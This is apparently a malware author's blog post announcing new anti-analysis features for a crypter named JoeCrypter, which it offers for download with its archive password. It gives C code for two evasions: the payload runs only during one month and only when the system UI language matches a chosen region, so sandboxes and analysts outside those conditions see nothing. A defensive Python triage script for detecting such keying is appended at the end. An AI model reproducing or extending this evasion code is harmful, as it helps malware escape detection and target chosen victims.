Hey hey hey!
Been gone a while, but not forever. I’m back with an update to my crypter. I was on the plane over the Pacific during a long ass flight when it hit me – 2 new ways to evade analysis.
- Date-specific checks
- Region-specific checks
I’ve added the functionality to JoeCrypter and have also added a switch to disable the music (help menu). When I think of more evasions, I will add them to the app.
The code is simple enough. It uses the basic standard time structures to check the current date, so the binary only runs for 1 month.
```c
void date_specific_check(char *shortdate)
{
    time_t rawtime;
    struct tm * timeinfo;
    char currentdate[80];

    time (&rawtime);
    timeinfo = localtime(&rawtime);
    strftime(currentdate,80,"%d/%m/%Y",timeinfo);

    //get current date, check against current month
    if(strstr(currentdate,shortdate))
    {
        return; // clean return
    }
    else{
        PassToNoobs();
    }
}
```
The region-specific check uses the GetSystemDefaultUILanguage API to grab the current language setting and checks it against the language passed from the main program.
I’ve omitted some code for space.
```c
void region_specific_check(char *region)
{
    LANGID id;
    char *lang = "";

    id = GetSystemDefaultUILanguage();
    switch(id)
    {
        case 0x0000: lang = "Language Neutral"; break;
        case 0x007f: lang = "Locale Invariant"; break;
        case 0x0400: lang = "User Default Language"; break;
        case 0x0800: lang = "System Default Language"; break;
        case 0x0436: lang = "Afrikaans"; break;
        case 0x041c: lang = "Albanian"; break;
        case 0x0401: lang = "Arabic (Saudi Arabia)"; break;
        ...
        ...
        ...
    }
    if(strcmp(lang,region))
    {
        return 1;
    }
    else
    {
        PassToNoobs();
    }
    return 0;
}
```
Easy enough, right? This ensures our target is only executed in the region we want. The latest version of the crypter is JoeCrypter. The password is ‘gironsec’.
I will be doing the PIN stuff next post, but for now, enjoy the crypter.
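
For analysts triaging a sample keyed on date or UI language as described above, a static pass over the file's strings can show that a detonation should be repeated with a different system date or UI language. This is an added example, not code from the original post or from JoeCrypter; the indicator lists and the constructed byte strings are assumptions.

```python
import re

# Indicator lists are assumptions chosen for this example; extend for real triage.
LOCALE_APIS = [b"GetSystemDefaultUILanguage", b"GetUserDefaultUILanguage",
               b"GetSystemDefaultLangID", b"GetUserDefaultLCID"]
TIME_APIS = [b"localtime", b"strftime", b"GetLocalTime", b"GetSystemTime"]
LANG_NAMES = {b"Language Neutral", b"Locale Invariant", b"Afrikaans",
              b"Albanian", b"Arabic (Saudi Arabia)"}
DATE_FMT = re.compile(rb"(?:%[dmYyjbB][/\-. ]?){2,3}")   # e.g. %d/%m/%Y
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")              # printable strings


def triage(blob: bytes) -> dict:
    """Collect date- and locale-keying indicators from a binary's raw bytes."""
    strings = set(ASCII_RUN.findall(blob))
    found = {
        # Substring search so decorated names (e.g. _localtime64) still match.
        "locale_apis": sorted(a.decode() for a in LOCALE_APIS if a in blob),
        "time_apis": sorted(a.decode() for a in TIME_APIS if a in blob),
        "date_formats": sorted(s.decode() for s in strings
                               if DATE_FMT.fullmatch(s)),
        # Two or more language display names suggest a LANGID-to-name table.
        "language_table": len(strings & LANG_NAMES) >= 2,
    }
    rerun = []
    if found["time_apis"] and found["date_formats"]:
        rerun.append("shifted system date")
    if found["locale_apis"]:
        rerun.append("different UI language")
    found["rerun_with"] = rerun
    return found


# Constructed byte strings standing in for file contents (not real samples).
KEYED = (b"\x00\x01GetSystemDefaultUILanguage\x00KERNEL32.dll\x00\x00localtime\x00"
         b"strftime\x00%d/%m/%Y\x00Afrikaans\x00Albanian\x00Language Neutral\x00")
PLAIN = b"\x00GetLocalTime\x00%s: %d\x00hello world\x00"

if __name__ == "__main__":
    for name, blob in (("KEYED", KEYED), ("PLAIN", PLAIN)):
        print(name, triage(blob))
```

Packed or encrypted stubs hide these strings, so an empty result only means the check has to be repeated on the unpacked image or in a dynamic run.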